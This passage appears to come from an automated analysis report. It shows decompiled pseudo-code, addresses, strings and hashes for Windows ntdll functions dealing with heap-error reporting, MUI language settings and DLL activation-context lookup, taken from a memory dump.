						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter2: %p\n",  *0x19b58a8);
				}
				_t117 =  *0x19b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter3: %p\n",  *0x19b58ac);
				}
				_t119 =  *0x19b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19b58b4);
					E018CB150("Last known valid blocks: before - %p, after - %p\n",  *0x19b58b0);
				} else {
					_t120 =  *0x19b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E018CB150("Stack trace available at %p\n", 0x19b58c0);
			}

0x01981c10
0x01981c16
0x01981c1e
0x01981c3d
0x01981c3e
0x01981c20
0x01981c35
0x01981c3a
0x01981c44
0x01981c55
0x01981c5a
0x01981c65
0x01981c67
0x00000000
0x01981c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01981c67
0x01981cdc
0x01981ce5
0x01981d04
0x01981d05
0x01981ce7
0x01981cfc
0x01981d01
0x01981d0b
0x01981d17
0x01981d1f
0x01981d25
0x01981d30
0x01981d4f
0x01981d50
0x01981d32
0x01981d47
0x01981d4c
0x01981d61
0x01981d67
0x01981d68
0x01981d6e
0x01981d79
0x01981d98
0x01981d99
0x01981d7b
0x01981d90
0x01981d95
0x01981daa
0x01981db0
0x01981db1
0x01981db7
0x01981dc2
0x01981de1
0x01981de2
0x01981dc4
0x01981dd9
0x01981dde
0x01981df3
0x01981df9
0x01981dfa
0x01981e00
0x01981e0a
0x01981e13
0x01981e32
0x01981e33
0x01981e15
0x01981e2a
0x01981e2f
0x01981e39
0x01981e4a
0x01981e02
0x01981e02
0x01981e08
0x00000000
0x00000000
0x01981e08
0x01981e5b
0x01981e7a
0x01981e7b
0x01981e5d
0x01981e72
0x01981e77
0x01981e95

Strings

heap_failure_unknown, xrefs: 01981C75
HEAP[%wZ]: , xrefs: 01981C30, 01981CF7, 01981D42, 01981D8B, 01981DD4, 01981E25, 01981E6D
heap_failure_listentry_corruption, xrefs: 01981CD0
heap_failure_block_not_busy, xrefs: 01981CA6
heap_failure_buffer_underrun, xrefs: 01981C9F
heap_failure_buffer_overrun, xrefs: 01981C98
heap_failure_internal, xrefs: 01981C6E
heap_failure_lfh_bitmap_mismatch, xrefs: 01981CD7
heap_failure_invalid_argument, xrefs: 01981CAD
heap_failure_invalid_allocation_type, xrefs: 01981CB4
Heap error detected at %p (heap handle %p), xrefs: 01981C50
Last known valid blocks: before - %p, after - %p, xrefs: 01981E45
Error code: %d - %s, xrefs: 01981D12
heap_failure_entry_corruption, xrefs: 01981C83
heap_failure_multiple_entries_corruption, xrefs: 01981C8A
Parameter1: %p, xrefs: 01981D5C
Parameter2: %p, xrefs: 01981DA5
Parameter3: %p, xrefs: 01981DEE
heap_failure_cross_heap_operation, xrefs: 01981CC2
heap_failure_virtual_block_corruption, xrefs: 01981C91
heap_failure_generic, xrefs: 01981C7C
heap_failure_usage_after_free, xrefs: 01981CBB
heap_failure_freelists_corruption, xrefs: 01981CC9
Stack trace available at %p, xrefs: 01981E86
HEAP: , xrefs: 01981C16, 01981C3D, 01981D04, 01981D4F, 01981D98, 01981DE1, 01981E32, 01981E7A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: ce5ac4dded8493074c7ee0ab39698a82760e88cf83a69e5097106d7ff46ecff2
Instruction ID: 4b8d3a85fe53f9dcadb6d3f605be7c89ad8c29fe79f401d4fc8c91b07b5e211b
Opcode Fuzzy Hash: ce5ac4dded8493074c7ee0ab39698a82760e88cf83a69e5097106d7ff46ecff2
Instruction Fuzzy Hash: 3F61E532914945DFE221BB89D4C5E6473A8EB04F61B0A843EF50EDB311D678DE46CB0B

Uniqueness

Uniqueness Score: -1.00%

Function 018D3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E018D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0190F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01911370(_t276, 0x18a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0190BB40(0,  &_v68, _t170);
									if(L018D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0190BB40(_t257,  &_v68, _t243);
								if(L018D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01911370(_t278, 0x18a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0190F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01911370(_v16, 0x18a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0190BB40(_t262,  &_v68, _t244);
								if(L018D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01911370(_t282, 0x18a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0190BB40(_t262,  &_v68, _t201);
							if(L018D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0190F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01911370(_t280, 0x18a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0190BB40(_t267,  &_v68, _t245);
							if(L018D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01911370(_t284, 0x18a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0190BB40(_t267,  &_v68, _t224);
						if(L018D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x018d3d3c
0x018d3d42
0x018d3d44
0x018d3d46
0x018d3d49
0x018d3d4c
0x018d3d4f
0x018d3d52
0x018d3d55
0x018d3d58
0x018d3d5b
0x018d3d5f
0x018d3d61
0x018d3d66
0x01928213
0x01928218
0x018d4085
0x018d4088
0x018d408e
0x018d4094
0x018d409a
0x018d40a0
0x018d40a6
0x018d40a9
0x018d40af
0x018d40b6
0x018d40bd
0x018d40bd
0x018d3d83
0x0192821f
0x01928229
0x01928238
0x01928238
0x0192823d
0x0192823d
0x018d3da0
0x018d3daf
0x018d3db5
0x018d3dba
0x018d3dba
0x018d3dd4
0x018d3e94
0x018d3eab
0x018d3f6d
0x018d3f84
0x018d406b
0x018d406b
0x018d406e
0x018d406e
0x018d4070
0x018d4074
0x01928351
0x01928351
0x018d407a
0x018d407f
0x0192835d
0x01928370
0x01928377
0x01928379
0x0192837c
0x0192837c
0x0192835d
0x00000000
0x018d407f
0x018d3f8a
0x018d3f8d
0x018d3f90
0x018d3f95
0x0192830d
0x0192830f
0x018d3f9b
0x018d3fac
0x018d3fae
0x018d3fb1
0x018d3fb1
0x018d3fb6
0x01928317
0x0192831a
0x00000000
0x018d3fbc
0x018d3fc1
0x018d3fc9
0x018d3fd7
0x018d3fda
0x018d3fdd
0x018d4021
0x018d4021
0x018d4029
0x018d4030
0x018d4044
0x018d4046
0x018d4046
0x018d4044
0x018d4049
0x01928327
0x01928334
0x01928339
0x0192833c
0x018d404f
0x018d404f
0x018d404f
0x018d4051
0x018d4056
0x018d4063
0x018d4063
0x018d4068
0x00000000
0x018d4068
0x018d3fdf
0x018d3fe2
0x018d3fe4
0x018d3fe7
0x018d3fef
0x018d4003
0x018d4005
0x018d4005
0x018d400c
0x018d4013
0x018d4016
0x018d4017
0x018d401b
0x018d401e
0x00000000
0x018d401e
0x018d3fb6
0x018d3eb1
0x018d3eb4
0x018d3eb7
0x018d3ebc
0x019282a9
0x019282ab
0x018d3ec2
0x018d3ed3
0x018d3ed5
0x018d3ed8
0x018d3ed8
0x018d3edd
0x019282b3
0x019282b6
0x00000000
0x018d3ee3
0x018d3ee8
0x018d3eed
0x018d3ef0
0x018d3ef3
0x018d3f02
0x018d3f05
0x018d3f08
0x019282c0
0x019282c3
0x019282c5
0x019282c8
0x019282d0
0x019282e4
0x019282e6
0x019282e6
0x019282ed
0x019282f4
0x019282f7
0x019282f8
0x019282fc
0x019282ff
0x019282ff
0x018d3f0e
0x018d3f11
0x018d3f16
0x018d3f1d
0x018d3f31
0x01928307
0x01928307
0x018d3f31
0x018d3f39
0x018d3f48
0x018d3f4d
0x018d3f50
0x018d3f50
0x018d3f53
0x018d3f58
0x018d3f65
0x018d3f65
0x018d3f6a
0x00000000
0x018d3f6a
0x018d3edd
0x018d3dda
0x018d3ddd
0x018d3de0
0x018d3de5
0x01928245
0x018d3deb
0x018d3df7
0x018d3dfc
0x018d3dfe
0x018d3e01
0x018d3e01
0x018d3e06
0x0192824d
0x0192824f
0x01928254
0x00000000
0x018d3e0c
0x018d3e11
0x018d3e16
0x018d3e19
0x018d3e29
0x018d3e2c
0x018d3e2f
0x0192825c
0x0192825f
0x01928261
0x01928264
0x0192826c
0x01928280
0x01928282
0x01928282
0x01928289
0x01928290
0x01928293
0x01928294
0x01928298
0x0192829b
0x0192829b
0x018d3e35
0x018d3e38
0x018d3e3d
0x018d3e44
0x018d3e58
0x019282a3
0x019282a3
0x018d3e58
0x018d3e60
0x018d3e6f
0x018d3e74
0x018d3e77
0x018d3e77
0x018d3e7a
0x018d3e7f
0x018d3e8c
0x018d3e8c
0x018d3e91
0x00000000
0x018d3e91

Strings

WindowsExcludedProcs, xrefs: 018D3D6F
Kernel-MUI-Number-Allowed, xrefs: 018D3D8C
Kernel-MUI-Language-Allowed, xrefs: 018D3DC0
Kernel-MUI-Language-SKU, xrefs: 018D3F70
Kernel-MUI-Language-Disallowed, xrefs: 018D3E97

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 76b12d617c824d7a94548bd53a20f51df7580bc786099b9bae3cbe0093d3dbfd
Instruction ID: fcba5c9bb03ea342a9fc069206c7c04cf241608c951b12991e14719970d3791f
Opcode Fuzzy Hash: 76b12d617c824d7a94548bd53a20f51df7580bc786099b9bae3cbe0093d3dbfd
Instruction Fuzzy Hash: 00F138B2D00619EFDB15DF98C980AAEBBF9FF49750F14006AE905E7650E7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 018C40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E018C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E018CB150(", passed to %s", _t29);
					}
					_push("\n");
					E018CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x19b6378 = 1;
						asm("int3");
						 *0x19b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x018c40e6
0x018c40e8
0x018c40f1
0x0192042d
0x0192044c
0x01920451
0x0192042f
0x01920444
0x01920449
0x0192045d
0x01920466
0x0192046e
0x01920474
0x01920475
0x0192047a
0x0192048a
0x0192048c
0x01920493
0x01920494
0x01920494
0x00000000
0x0192049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 0192043F
Invalid heap signature for heap at %p, xrefs: 01920458
RtlAllocateHeap, xrefs: 01920468
, passed to %s, xrefs: 01920469
HEAP: , xrefs: 0192044C

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: ed75ec88fd7169b55004fc63be54a0ecd2e69a0511419b7b25c1c319ac7624c5
Instruction ID: 70f958404853fafca3adb3eae5105cc3cbd9bb8e29671762b7e4ff80218c1f97
Opcode Fuzzy Hash: ed75ec88fd7169b55004fc63be54a0ecd2e69a0511419b7b25c1c319ac7624c5
Instruction Fuzzy Hash: CA012D321059519FE225576D949EF5177A8DB40F70F2C803EF009C7785EAB8D544C211

Uniqueness

Uniqueness Score: -1.00%

Function 018F8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E018F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x19bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x19b8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x19b5780 & 0x00000003) != 0) {
							E01945510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x19b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0190B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x19b7984; // 0x1302ba8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x19b8464; // 0x74790110
					 *0x19bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E018F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x19b5780 & 0x00000005) != 0) {
						_push(_t49);
						E01945510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x018f8e0f
0x018f8e16
0x018f8e19
0x018f8e1b
0x018f8e21
0x018f8e7f
0x018f8e85
0x01939354
0x0193936c
0x01939371
0x0193937b
0x01939381
0x01939381
0x0193937b
0x018f8e9d
0x018f8e9d
0x018f8e29
0x018f8e2c
0x018f8e38
0x018f8e3e
0x018f8e43
0x018f8eb5
0x018f8eb9
0x019392aa
0x019392af
0x019392e8
0x019392e8
0x019392af
0x018f8eb9
0x018f8e45
0x018f8e53
0x018f8e5b
0x018f8e5f
0x018f8e78
0x018f8e78
0x018f8e7d
0x018f8ec3
0x018f8ecd
0x018f8ed2
0x018f8ed2
0x018f8ec5
0x018f8ec5
0x00000000
0x018f8e7d
0x018f8e67
0x018f8ea4
0x0193931a
0x00000000
0x00000000
0x01939320
0x018f8ea4
0x018f8e70
0x01939325
0x01939340
0x01939345
0x01939345
0x018f8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0193932A
LdrpFindDllActivationContext, xrefs: 01939331, 0193935D
minkernel\ntdll\ldrsnap.c, xrefs: 0193933B, 01939367
Querying the active activation context failed with status 0x%08lx, xrefs: 01939357

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 6447031e2f71eee99b3d00bb35e92385a3161b249634d75f5aefe2ceec83e2f6
Instruction ID: 4d7aaa03be6e89a70b326f3c5cee008e2a3413e78314d00c600d9a2d79896125
Opcode Fuzzy Hash: 6447031e2f71eee99b3d00bb35e92385a3161b249634d75f5aefe2ceec83e2f6
Instruction Fuzzy Hash: B9412932A003159FEB36AE1CCCC8B7976A5AB42348F06456DEB18D7151E7706F808381

Uniqueness

Uniqueness Score: -1.00%

Function 019849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01984A3D, 01984AB7
This is located in the %s field of the heap header., xrefs: 01984AD6
HEAP: , xrefs: 01984A4A, 01984A5D, 01984A5F, 01984AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01984A61

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 43e86a9d0845a199fda58f7dec37795608b772f3a5d800be1e824786c221559b
Instruction ID: 01d75c4ef2e9328b98131fd665b85db21ab207d2a7d32c165da95b05722bcc28
Opcode Fuzzy Hash: 43e86a9d0845a199fda58f7dec37795608b772f3a5d800be1e824786c221559b
Instruction Fuzzy Hash: 33312831200502EFE721EB9DC889F67B7ACEF04B61F14446AF50ACF251E674EA44C759

Uniqueness

Uniqueness Score: -1.00%

Function 018D8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E018D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E018D934A() != 0) {
								_t159 = E0194A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x19b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01945510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x19b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E018D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E018D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
